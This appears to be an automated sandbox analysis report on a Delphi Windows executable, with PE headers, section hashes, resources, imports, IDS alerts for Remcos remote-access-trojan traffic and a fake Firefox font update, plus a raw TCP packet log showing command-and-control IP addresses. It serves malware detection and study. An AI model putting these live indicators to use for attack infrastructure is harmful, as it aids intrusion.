                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al

                                                                                                                      Data Directories

                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x770000x26cc.idata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x840000xbec00.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x7c0000x7270.reloc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x7b0000x18.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x777480x608.idata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                      Sections

                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x10000x657900x6580096f62bec9c9c6c4fd98588caabf7d9e9False0.5204813539100985data6.522398430730482IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .itext0x670000x7a40x8006bb8ba2eb69b5418fa4684f5c10d091cFalse0.6044921875data6.071638724874274IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .data0x680000xacd00xae0026a3413559491a08fb28b01bb97df17eFalse0.08494971264367816data5.945613906579282IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .bss0x730000x38240x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .idata0x770000x26cc0x280015090b6abde6267d4ea968c633c0c902False0.315625data5.111315272204222IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .tls0x7a0000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .rdata0x7b0000x180x2007583add25277ddf9ad8f833acb5c523dFalse0.05078125data0.2069200177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .reloc0x7c0000x72700x7400c03c7cb51eaa26e513ed1bed0f37e7feFalse0.6224744073275862data6.661969322059487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                      .rsrc0x840000xbec000xbec00d4c33b09f9db1492ded509cf91950b39False0.402672683895806data5.732887307792081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                      Resources

                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      RT_CURSOR0x852600x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                      RT_CURSOR0x853940x134dataEnglishUnited States0.4642857142857143
                                                                                                                      RT_CURSOR0x854c80x134dataEnglishUnited States0.4805194805194805
                                                                                                                      RT_CURSOR0x855fc0x134dataEnglishUnited States0.38311688311688313
                                                                                                                      RT_CURSOR0x857300x134dataEnglishUnited States0.36038961038961037
                                                                                                                      RT_CURSOR0x858640x134dataEnglishUnited States0.4090909090909091
                                                                                                                      RT_CURSOR0x859980x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                      RT_BITMAP0x85acc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                      RT_BITMAP0x85c9c0x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                                                                      RT_BITMAP0x85e800x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                      RT_BITMAP0x860500x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                                                                      RT_BITMAP0x862200x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                                                                      RT_BITMAP0x863f00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                                                                      RT_BITMAP0x865c00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                                                                      RT_BITMAP0x867900x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                      RT_BITMAP0x869600x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                                                                      RT_BITMAP0x86b300x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                      RT_BITMAP0x86d000xb3e78Device independent bitmap graphic, 802 x 306 x 24, image size 736848EnglishUnited States0.40976783446059645
                                                                                                                      RT_BITMAP0x13ab780x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.39864864864864863
                                                                                                                      RT_BITMAP0x13aca00x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                                                                                                                      RT_BITMAP0x13adc80x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                                                                                                                      RT_BITMAP0x13aef00xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States0.36637931034482757
                                                                                                                      RT_BITMAP0x13afd80x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.3614864864864865
                                                                                                                      RT_BITMAP0x13b1000x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                                                                                                                      RT_BITMAP0x13b2280xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.49038461538461536
                                                                                                                      RT_BITMAP0x13b2f80x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3716216216216216
                                                                                                                      RT_BITMAP0x13b4200x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.2905405405405405
                                                                                                                      RT_BITMAP0x13b5480x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.38175675675675674
                                                                                                                      RT_BITMAP0x13b6700x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                                                                                                                      RT_BITMAP0x13b7980x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                                                                                                                      RT_BITMAP0x13b8c00xe8Device independent bitmap graphic, 12 x 16 x 4, image size 128EnglishUnited States0.3620689655172414
                                                                                                                      RT_BITMAP0x13b9a80x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.3581081081081081
                                                                                                                      RT_BITMAP0x13bad00x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.375
                                                                                                                      RT_BITMAP0x13bbf80xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.47115384615384615
                                                                                                                      RT_BITMAP0x13bcc80x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.36824324324324326
                                                                                                                      RT_BITMAP0x13bdf00x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.28716216216216217
                                                                                                                      RT_BITMAP0x13bf180x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                                                                                                                      RT_BITMAP0x13c0400x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.375
                                                                                                                      RT_BITMAP0x13c1680x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.375
                                                                                                                      RT_BITMAP0x13c2900xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States0.36637931034482757
                                                                                                                      RT_BITMAP0x13c3780x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.35135135135135137
                                                                                                                      RT_BITMAP0x13c4a00x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.36486486486486486
                                                                                                                      RT_BITMAP0x13c5c80xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.47115384615384615
                                                                                                                      RT_BITMAP0x13c6980x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3581081081081081
                                                                                                                      RT_BITMAP0x13c7c00x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.28716216216216217
                                                                                                                      RT_BITMAP0x13c8e80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                                                                      RT_ICON0x13c9d00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m0.2045643153526971
                                                                                                                      RT_DIALOG0x13ef780x52data0.7682926829268293
                                                                                                                      RT_DIALOG0x13efcc0x52data0.7560975609756098
                                                                                                                      RT_STRING0x13f0200x1fcdata0.47244094488188976
                                                                                                                      RT_STRING0x13f21c0x158data0.6017441860465116
                                                                                                                      RT_STRING0x13f3740xc8data0.67
                                                                                                                      RT_STRING0x13f43c0x134data0.5909090909090909
                                                                                                                      RT_STRING0x13f5700x494data0.3796928327645051
                                                                                                                      RT_STRING0x13fa040x368data0.3830275229357798
                                                                                                                      RT_STRING0x13fd6c0x37cdata0.38565022421524664
                                                                                                                      RT_STRING0x1400e80x3f8data0.37696850393700787
                                                                                                                      RT_STRING0x1404e00xf4data0.5532786885245902
                                                                                                                      RT_STRING0x1405d40xc4data0.6275510204081632
                                                                                                                      RT_STRING0x1406980x22cdata0.5017985611510791
                                                                                                                      RT_STRING0x1408c40x3b4data0.3227848101265823
                                                                                                                      RT_STRING0x140c780x368data0.37844036697247707
                                                                                                                      RT_STRING0x140fe00x2b8data0.3879310344827586
                                                                                                                      RT_RCDATA0x1412980x10data1.5
                                                                                                                      RT_RCDATA0x1412a80x2fcdata0.7028795811518325
                                                                                                                      RT_RCDATA0x1415a40x1295Delphi compiled form 'Tfrm_MainProg'0.2837923060752575
                                                                                                                      RT_GROUP_CURSOR0x14283c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                      RT_GROUP_CURSOR0x1428500x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                      RT_GROUP_CURSOR0x1428640x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x1428780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x14288c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x1428a00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x1428b40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_ICON0x1428c80x14data1.25
                                                                                                                      RT_MANIFEST0x1428dc0x245XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5249569707401033

                                                                                                                      Imports

                                                                                                                      DLLImport
                                                                                                                      oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                      user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                                                      kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                                                      kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                      user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                      gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, Polyline, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                                                                                                      version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                      kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                                                                      kernel32.dllSleep
                                                                                                                      oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                                      comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                                      shell32.dllShellExecuteA
                                                                                                                      comdlg32.dllGetOpenFileNameA

                                                                                                                      Possible Origin

                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                      EnglishUnited States

                                                                                                                      Network Behavior

                                                                                                                      Suricata IDS Alerts

                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                      2024-12-06T11:04:28.472775+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650033104.243.42.2545874TCP
                                                                                                                      2024-12-06T11:04:36.837037+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649716185.166.143.50443TCP
                                                                                                                      2024-12-06T11:04:39.532643+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.6497183.5.30.3443TCP
                                                                                                                      2024-12-06T11:05:08.868641+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649730104.243.42.2545874TCP
                                                                                                                      2024-12-06T11:05:31.035427+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649785104.243.42.2545874TCP
                                                                                                                      2024-12-06T11:05:54.067255+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649856104.243.42.2545874TCP
                                                                                                                      2024-12-06T11:06:16.114807+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649914104.243.42.2545874TCP
                                                                                                                      2024-12-06T11:06:39.162175+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649967104.243.42.2545874TCP
                                                                                                                      2024-12-06T11:07:01.193957+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650018104.243.42.2545874TCP
                                                                                                                      2024-12-06T11:07:24.260479+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650028104.243.42.2545874TCP
                                                                                                                      2024-12-06T11:07:46.319799+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650030104.243.42.2545874TCP
                                                                                                                      2024-12-06T11:08:09.367055+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650031104.243.42.2545874TCP
                                                                                                                      2024-12-06T11:08:31.397225+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650032104.243.42.2545874TCP

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 6, 2024 11:04:34.941694021 CET49715443192.168.2.6185.166.143.50
                                                                                                                      Dec 6, 2024 11:04:34.941739082 CET44349715185.166.143.50192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:34.941817999 CET49715443192.168.2.6185.166.143.50
                                                                                                                      Dec 6, 2024 11:04:34.942006111 CET49715443192.168.2.6185.166.143.50
                                                                                                                      Dec 6, 2024 11:04:34.942065001 CET44349715185.166.143.50192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:34.942132950 CET49715443192.168.2.6185.166.143.50
                                                                                                                      Dec 6, 2024 11:04:35.170623064 CET49716443192.168.2.6185.166.143.50
                                                                                                                      Dec 6, 2024 11:04:35.170685053 CET44349716185.166.143.50192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:35.170764923 CET49716443192.168.2.6185.166.143.50
                                                                                                                      Dec 6, 2024 11:04:35.254345894 CET49716443192.168.2.6185.166.143.50
                                                                                                                      Dec 6, 2024 11:04:35.254395008 CET44349716185.166.143.50192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:36.836910963 CET44349716185.166.143.50192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:36.837037086 CET49716443192.168.2.6185.166.143.50
                                                                                                                      Dec 6, 2024 11:04:36.841913939 CET49716443192.168.2.6185.166.143.50
                                                                                                                      Dec 6, 2024 11:04:36.841928005 CET44349716185.166.143.50192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:36.842211008 CET44349716185.166.143.50192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:36.887161970 CET49716443192.168.2.6185.166.143.50
                                                                                                                      Dec 6, 2024 11:04:36.925502062 CET49716443192.168.2.6185.166.143.50
                                                                                                                      Dec 6, 2024 11:04:36.971333027 CET44349716185.166.143.50192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:37.740350008 CET44349716185.166.143.50192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:37.740375042 CET44349716185.166.143.50192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:37.740434885 CET44349716185.166.143.50192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:37.740483046 CET49716443192.168.2.6185.166.143.50
                                                                                                                      Dec 6, 2024 11:04:37.740515947 CET49716443192.168.2.6185.166.143.50
                                                                                                                      Dec 6, 2024 11:04:37.762048006 CET49716443192.168.2.6185.166.143.50
                                                                                                                      Dec 6, 2024 11:04:37.762083054 CET44349716185.166.143.50192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:38.116585970 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:38.116640091 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:38.116699934 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:38.117127895 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:38.117140055 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:39.532558918 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:39.532643080 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:39.534349918 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:39.534360886 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:39.534621000 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:39.536686897 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:39.579344034 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:39.995718002 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.046219110 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.046236992 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.046307087 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.046324015 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.046401024 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.223202944 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.223229885 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.223340034 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.223362923 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.223418951 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.230912924 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.275154114 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.277900934 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.277923107 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.278029919 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.278043985 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.278111935 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.285634041 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.293415070 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.293497086 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.293513060 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.339184999 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.383781910 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.383795977 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.383891106 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.383905888 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.409806967 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.409857988 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.409884930 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.409895897 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.409940958 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.452075005 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.452086926 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.452136040 CET443497183.5.30.3192.168.2.6
